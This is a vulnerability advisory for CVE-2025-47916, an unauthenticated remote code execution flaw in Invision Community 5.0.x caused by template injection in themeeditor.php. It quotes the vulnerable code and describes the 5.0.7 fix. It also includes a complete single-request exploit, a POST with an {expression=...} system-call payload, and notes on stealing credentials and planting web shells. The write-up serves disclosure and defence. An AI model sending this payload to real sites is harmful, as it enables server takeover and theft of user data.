CVE-2025-47916: Unauthenticated RCE in Invision Community via SSTI

CVE-2025-47916 represents a critical security failure in the Invision Community platform, specifically affecting versions 5.0.0 through 5.0.6. The vulnerability is a combination of Improper Access Control (CWE-284) and Server-Side Template Injection (CWE-1336), resulting in unauthenticated Remote Code Execution (RCE).

The specific flaw is located within the themeeditor.php controller file. Despite the sensitive nature of theme editing functionality, the application exposes a method intended for CSS processing to unauthenticated web requests. Because this method utilizes the application's powerful template engine to parse input, it inadvertently exposes a mechanism for arbitrary code execution.

With a CVSS v3.1 score of 10.0, this issue is classified as critical. It requires no authentication, no user interaction, and can be exploited remotely over the network. The impact is total system compromise, allowing attackers to bypass all application security controls.

The vulnerability stems from two concurrent failures in the /applications/core/modules/front/system/themeeditor.php file.

1. Improper Access Control: The method customCss() is defined within the controller. While declared protected, the Invision Community routing dispatcher in the affected versions allows external requests to invoke this method by specifying the do=customCss parameter. This bypasses the standard authentication checks typically required for administrative actions.

2. Unsafe Template Processing: Inside the customCss() method, the application retrieves raw user input from Request::i()->content and passes it directly to Theme::makeProcessFunction(). This function is the core of the Invision template engine, responsible for compiling template strings into executable PHP code. The engine supports specific syntax, such as {expression="..."}, which evaluates the contained string as PHP code. By injecting this syntax, an attacker forces the server to compile and execute arbitrary PHP commands.

The following analysis highlights the vulnerable logic in themeeditor.php prior to the patch.

Vulnerable Code (Versions 5.0.0 - 5.0.6):

protected function customCss() : void
{
    $functionName = "css_" . uniqid();
    
    // CRITICAL: User input (Request::i()->content) is passed directly 
    // to the template compiler (Theme::makeProcessFunction).
    Theme::makeProcessFunction( 
        Theme::fixResourceTags( (string) Request::i()->content, 'front' ), 
        $functionName, 
        '', 
        FALSE, 
        TRUE 
    );
 
    $fqFunc     = 'IPS\\Theme\\'. $functionName;
    // The compiled function is immediately executed.
    $content    = Theme::minifyCss( $fqFunc() );
 
    /* Replace any <fileStore.xxx> tags in the CSS */
    Output::i()->parseFileObjectUrls( $content );
    Output::i()->json( [ 'content' => $content ] );
}

The Theme::makeProcessFunction generates a temporary PHP function based on the input string. If the input contains {expression="system('id')"}, the generated PHP function will contain a call to system('id'). When $fqFunc() is called lines later, that payload executes.

Remediation in Version 5.0.7: The vendor addressed this by modifying the access control logic for the themeeditor controller or removing the accessible route entirely for unprivileged users. The fix prevents the dispatcher from routing unauthenticated requests to this sensitive method.

Exploiting CVE-2025-47916 is trivial and requires only a single HTTP POST request. The attacker does not need credentials or a specific server configuration.

Attack Workflow:

1. Target Identification: The attacker identifies a target running Invision Community 5.0.x.
2. Payload Construction: The attacker crafts a payload using the template engine's expression syntax. A common payload for verifying execution is {expression="die(system('id'))"}.
3. Request Transmission: The attacker sends a POST request to the root index.php or the specific controller path.

Example HTTP Request:

POST /index.php HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded
 
app=core&module=system&controller=themeeditor&do=customCss&content={expression="die(system('whoami'))"}

Execution Flow Diagram:

Upon processing, the server executes whoami and returns the output in the HTTP response, confirming code execution.

The impact of this vulnerability is catastrophic for affected deployments.

System Compromise: Successful exploitation grants the attacker code execution privileges equivalent to the web server user (typically www-data or apache). This allows for reading configuration files (such as conf_global.php), which contain database credentials and encryption keys.

Data Breach: With database access, attackers can exfiltrate sensitive user data, including hashed passwords, email addresses, and private messages. This constitutes a significant privacy breach and regulatory violation (GDPR, CCPA).

Persistence and Lateral Movement: Attackers can upload web shells or backdoors to maintain persistent access even after the vulnerability is patched. If the web server is not properly isolated, this entry point can be used to pivot to other internal systems within the network infrastructure.